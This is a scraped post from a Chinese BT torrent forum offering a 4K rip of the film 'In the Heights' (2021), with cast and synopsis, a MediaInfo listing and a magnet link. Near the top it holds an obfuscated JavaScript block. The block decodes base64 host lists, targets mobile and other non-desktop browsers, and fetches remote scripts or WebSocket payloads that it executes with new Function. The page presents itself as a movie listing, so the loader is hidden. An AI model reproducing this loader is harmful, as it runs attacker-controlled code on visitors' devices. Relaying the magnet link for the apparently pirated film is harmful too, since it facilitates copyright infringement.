身在高地[中文字幕].In.the.Heights.2021.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit 14.30GB

版主小s 14天前 163

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 身在高地 / 活在上城 / 纽约高地(台) / 狂舞纽约(港)
◎片  名 In the Heights
◎年  代 2021
◎产  地 美国
◎类  别 音乐 / 歌舞
◎语  言 英语 / 西班牙语
◎上映日期 2021-06-11(美国)
◎IMDb链接 https://www.imdb.com/title/tt1321510/
◎豆瓣评分 7.2/10 (2285人评价)
◎豆瓣链接 https://movie.douban.com/subject/3279094/
◎片  长 143分钟
◎导  演 朱浩伟 Jon M. Chu (id:1040849)
◎编  剧 琦亚拉·艾蕾葛莉亚·休德斯 Quiara Alegria Hudes (id:1367423)
       林-曼努尔·米兰达 Lin-Manuel Miranda (id:1118251)
◎演  员 安东尼·拉莫斯 Anthony Ramos (id:1388489)
       梅丽莎·巴雷拉 Melissa Barrera (id:1388770)
       斯蒂芬妮·比翠丝 Stephanie Beatriz (id:1334711)
       阿丽亚娜·格林布拉特 Ariana Greenblatt (id:1389345)
       林-曼努尔·米兰达 Lin-Manuel Miranda (id:1118251)
       吉米·斯密茨 Jimmy Smits (id:1010598)
       科里·霍金斯 Corey Hawkins (id:1341485)
       达丝莎·坡兰科 Dascha Polanco (id:1332178)
       克里斯·杰克逊 Chris Jackson (id:1418546)
       达芬妮·鲁宾-维佳 Daphne Rubin-Vega (id:1147513)
       马克·安东尼 Marc Anthony (id:1055355)
       黄景伟 Alex Wong (id:1265028)
       欧嘉·梅雷迪斯 Olga Merediz (id:1116173)
       Valéry Lessard Valéry Lessard (id:1451579)
       格里高利·迪亚兹四世 Gregory Diaz IV (id:1445417)
       苏珊·波尔法 Susan Pourfar (id:1374784)
       帕特里克·佩奇 Patrick Page (id:1135901)
       玛莎·尼科尔斯 Martha Nichols (id:1248337)
       阿列克莎·波勒 Alexa Poller (id:1229297)
       詹姆斯·雷娃 James Leyva (id:1434706)
       汤姆·伯克伦 Tom Berklund (id:1390512)
       亚历克斯·佩雷斯 Alex Perez (id:1395804)
       安妮·比萨比亚 Annie Pisapia (id:1392758)
       阿尔贝托·巴斯克斯 Alberto Vazquez (id:1155601)
       Henardo Rodriguez Henardo Rodriguez (id:1437029)
       Keith Kuhl Keith Kuhl (id:1329087)
       尼古拉斯·斯图尔特 Nicholas Stewart (id:1410070)
         (id:1446087)
       林-曼努尔·米兰达 Lin-Manuel Miranda (id:1118251)
       Brian Goodwin  Brian Goodwin (id:1438184)

◎标  签 音乐剧 / 美国 / 音乐 / 2021 / musical / LMM / 电影 / 歌舞

◎简  介
  讲述在纽约的华盛顿高地,杂货店老板Usnavi在继承了祖母的财产后,将要关掉店铺回到家乡多米尼加共和国过退休生活,对此他百感交集,而拉美裔社区和那里居民的吸引力让他停下来思考。影片围绕Usnavi、一名大学生、一名出租车司机、一位美容院员工和一个渴望更好生活的老妇人展开,随着中产阶级化开始扎根,闷热夏天中,一场停电让个人危机达到前所未有的高度。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 153764694110783547756952799404550318213 (0x73AE00BC98A2DCB23A197EC4449CE885)

  4. Complete name                            : In.the.Heig[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 14.3 GiB

  8. Duration                                 : 2 h 22 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 14.3 Mb/s

  11. Movie name                               : In the Heights 2021 2160p HDR UHD BluRay TrueHD 7.1 Atmos [email protected]

  12. Encoded date                             : UTC 2021-08-31 22:58:18

  13. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID                                       : 1

  17. Format                                   : HEVC

  18. Format/Info                              : High Efficiency Video Coding

  19. Format profile                           : Main [email protected]@High

  20. HDR format                               : SMPTE ST 2086, HDR10 compatible

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 2 h 22 min

  23. Bit rate                                 : 10.9 Mb/s

  24. Width                                    : 3 840 pixels

  25. Height                                   : 1 600 pixels

  26. Display aspect ratio                     : 2.40:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.074

  33. Stream size                              : 10.9 GiB (76%)

  34. Title                                    : @HDSky

  35. Writing library                          : x265 - H.265/HEVC codec

  36. Default                                  : Yes

  37. Forced                                   : No

  38. Color range                              : Limited

  39. Color primaries                          : BT.2020

  40. Transfer characteristics                 : PQ

  41. Matrix coefficients                      : BT.2020 non-constant

  42. Mastering display color primaries        : BT.2020

  43. Mastering display luminance              : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level              : 739 cd/m2

  45. Maximum Frame-Average Light Level        : 331 cd/m2


  46. Audio

  47. ID                                       : 2

  48. Format                                   : MLP FBA 16-ch

  49. Format/Info                              : Meridian Lossless Packing FBA with 16-channel presentation

  50. Commercial name                          : Dolby TrueHD with Dolby Atmos

  51. Codec ID                                 : A_TRUEHD

  52. Duration                                 : 2 h 22 min

  53. Bit rate mode                            : Variable

  54. Bit rate                                 : 3 224 kb/s

  55. Maximum bit rate                         : 4 650 kb/s

  56. Channel(s)                               : 8 channels

  57. Channel layout                           : L R C LFE Ls Rs Lb Rb

  58. Sampling rate                            : 48.0 kHz

  59. Frame rate                               : 1 200.000 FPS (40 SPF)

  60. Compression mode                         : Lossless

  61. Stream size                              : 3.22 GiB (23%)

  62. Title                                    : English

  63. Language                                 : English

  64. Default                                  : Yes

  65. Forced                                   : No

  66. Number of dynamic objects                : 11

  67. Bed channel count                        : 1 channel

  68. Bed channel configuration                : LFE


  69. Text #1

  70. ID                                       : 3

  71. Format                                   : PGS

  72. Muxing mode                              : zlib

  73. Codec ID                                 : S_HDMV/PGS

  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration                                 : 2 h 22 min

  76. Bit rate                                 : 45.9 kb/s

  77. Count of elements                        : 4886

  78. Stream size                              : 46.8 MiB (0%)

  79. Title                                    : ENG

  80. Language                                 : English

  81. Default                                  : Yes

  82. Forced                                   : No


  83. Text #2

  84. ID                                       : 4

  85. Format                                   : PGS

  86. Muxing mode                              : zlib

  87. Codec ID                                 : S_HDMV/PGS

  88. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration                                 : 2 h 22 min

  90. Bit rate                                 : 37.0 kb/s

  91. Count of elements                        : 4316

  92. Stream size                              : 37.7 MiB (0%)

  93. Title                                    : CHT

  94. Language                                 : Chinese

  95. Default                                  : No

  96. Forced                                   : No


  97. Text #3

  98. ID                                       : 5

  99. Format                                   : PGS

  100. Muxing mode                              : zlib

  101. Codec ID                                 : S_HDMV/PGS

  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration                                 : 2 h 22 min

  104. Bit rate                                 : 34.1 kb/s

  105. Count of elements                        : 4464

  106. Stream size                              : 34.7 MiB (0%)

  107. Title                                    : CHT

  108. Language                                 : Chinese

  109. Default                                  : No

  110. Forced                                   : No


  111. Text #4

  112. ID                                       : 6

  113. Format                                   : PGS

  114. Muxing mode                              : zlib

  115. Codec ID                                 : S_HDMV/PGS

  116. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration                                 : 2 h 22 min

  118. Bit rate                                 : 38.7 kb/s

  119. Count of elements                        : 4316

  120. Stream size                              : 39.4 MiB (0%)

  121. Title                                    : CHS

  122. Language                                 : Chinese

  123. Default                                  : No

  124. Forced                                   : No


  125. Text #5

  126. ID                                       : 7

  127. Format                                   : PGS

  128. Muxing mode                              : zlib

  129. Codec ID                                 : S_HDMV/PGS

  130. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  131. Duration                                 : 2 h 22 min

  132. Bit rate                                 : 39.4 kb/s

  133. Count of elements                        : 4316

  134. Stream size                              : 40.1 MiB (0%)

  135. Title                                    : CHT

  136. Language                                 : Chinese

  137. Default                                  : No

  138. Forced                                   : No


  139. Menu

  140. 13:15:21.859                             : en:Chapter 01

  141. 00:11:08.458                             : en:Chapter 02

  142. 00:18:18.180                             : en:Chapter 03

  143. 00:26:28.252                             : en:Chapter 04

  144. 00:30:08.138                             : en:Chapter 05

  145. 00:37:37.713                             : en:Chapter 06

  146. 00:43:58.594                             : en:Chapter 07

  147. 00:50:53.675                             : en:Chapter 08

  148. 00:59:38.824                             : en:Chapter 09

  149. 01:03:36.561                             : en:Chapter 10

  150. 01:12:32.264                             : en:Chapter 11

  151. 01:23:02.268                             : en:Chapter 12

  152. 01:32:45.475                             : en:Chapter 13

  153. 01:40:51.712                             : en:Chapter 14

  154. 01:51:08.369                             : en:Chapter 15

  155. 01:55:44.604                             : en:Chapter 16

  156. 02:04:37.595                             : en:Chapter 17

  157. 02:14:58.506                             : en:Chapter 18

  158. 02:21:45.829                             : en:Chapter 19



TAGS 歌舞 音乐

磁力链:
  • magnet:?xt=urn:btih:1BBDAEED3D2216694B5FED498D309D74C1D14717
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回